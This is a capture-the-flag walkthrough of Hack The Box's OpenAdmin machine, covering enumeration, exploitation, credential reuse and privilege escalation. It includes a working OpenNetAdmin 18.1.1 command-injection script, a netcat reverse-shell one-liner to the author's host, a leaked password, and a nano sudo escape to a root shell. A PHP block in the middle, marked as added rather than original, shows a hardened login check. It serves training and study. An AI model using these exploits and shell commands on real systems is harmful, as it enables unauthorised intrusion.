This post documents the complete walkthrough of OpenAdmin, a retired vulnerable VM created by dmw0ng, and hosted at Hack The Box. If you are uncomfortable with spoilers, please stop reading now.
Background
OpenAdmin is a retired vulnerable VM from Hack The Box.
Information Gathering
Let’s start with a masscan probe to establish the open ports on the host.
# masscan -e tun1 -p1-65535,U:1-65535 10.10.10.171 --rate=700
Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-01-07 01:55:18 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.10.171
Discovered open port 22/tcp on 10.10.10.171
Nothing extraordinary. Let’s do one better with nmap, scanning the discovered ports to establish their services.
# nmap -n -v -Pn -p22,80 -A --reason -oN nmap.txt 10.10.10.171
...
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
| 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-title: Apache2 Ubuntu Default Page: It works
Whoa! This is a shit-show man. In any case, this is what the site looks like.
You can’t get more default than this
Directory/File Enumeration
Let’s switch gears and see what we can discover from fuzzing the site with wfuzz.
# wfuzz -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 64 --hc 404 http://10.10.10.171/FUZZ
********************************************************
* Wfuzz 2.2.11 - The Web Fuzzer *
********************************************************
Target: http://10.10.10.171/FUZZ
Total requests: 4644
==================================================================
ID Response Lines Word Chars Payload
==================================================================
000669: C=301 9 L 28 W 314 Ch "artwork"
002145: C=200 375 L 964 W 10918 Ch "index.html"
002715: C=301 9 L 28 W 312 Ch "music"
003648: C=403 9 L 28 W 277 Ch "server-status"
000011: C=403 9 L 28 W 277 Ch ".htaccess"
000012: C=403 9 L 28 W 277 Ch ".htpasswd"
000010: C=403 9 L 28 W 277 Ch ".hta"
Total time: 26.21841
Processed Requests: 4644
Filtered Requests: 4637
Requests/sec.: 177.1274
Interesting. It appears that we have two directories: artwork and music. This is how they look.
/artwork
/music
They are both apparently very good-looking templates but only one of them offers the path forward. If you look at /music, there’s a hyperlink to /ona, which stands for OpenNetAdmin.
OpenNetAdmin 18.1.1 - Remote Code Execution
This is how it looks.
I think we have the exploit we need in EDB-ID 47691. After understanding what the exploit does, I modified it a little to suit my needs.
#!/bin/bash
HOST=10.10.10.171
CMD=$(urlencode $1)
curl -i \
-s \
-d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";$CMD;echo \"END\"&xajaxargs[]=ping" \
$HOST/ona/ \
| sed '/BEGIN/,/END/!d' \
| sed -r -e '1d' -e '$d'
Let’s give it a shot.
Awesome.
Low-Privilege Shell
With that, it’s pretty trivial to get a reverse shell, albeit a low-privileged one. On one end, send a reverse shell back to myself; on the other, set up a listener to receive it, you know, the standard stuff.
# ./cmd.sh "rm -rf /tmp/p; mknod /tmp/p p; /bin/bash </tmp/p | nc 10.10.15.195 1234 >/tmp/p"
Bam. There you have it.
Getting user.txt
During enumeration of www-data’s account, I notice that there are two accounts in the same group: jimmy (1000) and joanna (1001). They are both in the internal group.
A simple find for resources associated with the internal group reveals the following.
Further digging into virtual hosts configuration reveals the following.
Well, I know what to do but in any case, I’ll still need to log in to jimmy’s account first.
OpenNetAdmin’s Database Configuration
I chanced upon ONA’s database configuration while I was exploring the /opt/ona/www directory.
Hmm. The password n1nj4W4rri0R! piques my curiosity. Maybe it’s the password to one of the accounts? There’s only one way to find out.
Logging in as jimmy
Indeed. It’s jimmy’s password.
Now, we can navigate to /var/www/internal to look at its contents.
There’s something interesting in index.php.
if ($_POST['username'] == 'jimmy' && hash('sha512',$_POST['password']) == '00e302...0523b1') {
    $_SESSION['username'] = 'jimmy';
    header("Location: /main.php");
} else {
    $msg = 'Wrong username or password.';
}
In order to “log in”, the SHA512 hash of the password must match 00e302...0523b1. Using an online cracker, the password was revealed to be, are you ready? Revealed
Well, in any case, I could have edited index.php to have any password I like without resorting to password cracking.
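For contrast, here is a hardened version of that login check. This is an added example, not code from the box or the original post; the stored hash value is a constructed placeholder and the function name authenticate is my own.

```php
<?php
// Added example (not from the original post or the OpenAdmin VM): a hardened
// replacement for the index.php check shown above. The original has two defects:
//   1. It stores an unsalted SHA-512 digest, so the password can be recovered by
//      offline cracking or an online lookup, which is how the post got it.
//   2. It compares the digest with '==', a loose, non-constant-time comparison;
//      PHP treats two numeric-looking strings such as "0e123..." as numbers, so
//      distinct digests of that shape compare equal.
// Fix: store a password_hash() result (salted, slow) and check it with
// password_verify(), which is constant-time; compare the username with hash_equals().
session_start();

// Constructed placeholder hash. In a real deployment generate it once with
//   php -r 'echo password_hash("the-real-password", PASSWORD_DEFAULT);'
// and keep it outside the web root, never in index.php.
const JIMMY_HASH = '$2y$10$REPLACE_WITH_OUTPUT_OF_password_hash_xxxxxxxxxxxxxxxxx';

function authenticate(string $username, string $password, string $storedHash): bool
{
    // hash_equals() is a constant-time string comparison; the username is not
    // secret, but this avoids '==' type juggling on user-controlled input.
    $userOk = hash_equals('jimmy', $username);
    // password_verify() reads the salt and cost from the stored hash and
    // compares in constant time. Both checks always run, so a bad username
    // costs the same as a bad password.
    $passOk = password_verify($password, $storedHash);
    return $userOk && $passOk;
}

$msg = '';
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $username = (string)($_POST['username'] ?? '');
    $password = (string)($_POST['password'] ?? '');
    if (authenticate($username, $password, JIMMY_HASH)) {
        session_regenerate_id(true);   // fresh session id on login (anti-fixation)
        $_SESSION['username'] = 'jimmy';
        header('Location: /main.php');
        exit;
    }
    // Same message for either failure so the form does not confirm valid usernames.
    $msg = 'Wrong username or password.';
}
```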
SSH Local Port Forwarding
Since I have access to jimmy’s account, I can dump an SSH public key I control into /home/jimmy/.ssh/authorized_keys in order to forward my local port to the remote port 52846. Assuming I have done that, here’s the command to create the SSH tunnel to access internal.openadmin.htb:52846:
ssh -L 52846:127.0.0.1:52846 -i jimmy [email protected]
Once that’s done, I should have a local port listening at 52846/tcp.
Accessing joanna’s SSH private key
Suffice to say, I added internal.openadmin.htb to /etc/hosts, mapping it to 127.0.0.1.
After logging in, joanna’s password-protected SSH private key is revealed along with a hint at what the password might be.
John the Ripper
Enter JtR.
The password to unlock joanna’s private key is bloodninjas. With that, we can finally log in to joanna’s account and retrieve user.txt.
Privilege Escalation
During enumeration of joanna’s account, I notice that joanna is able to sudo nano to open /opt/priv.
GTFOBins
This is a classic GTFOBins attack. Following the instructions, I was able to break out of nano to get myself a root shell.
nano
^R^X
reset; sh 1>&0 2>&0
Armed with a root shell, getting root.txt is trivial.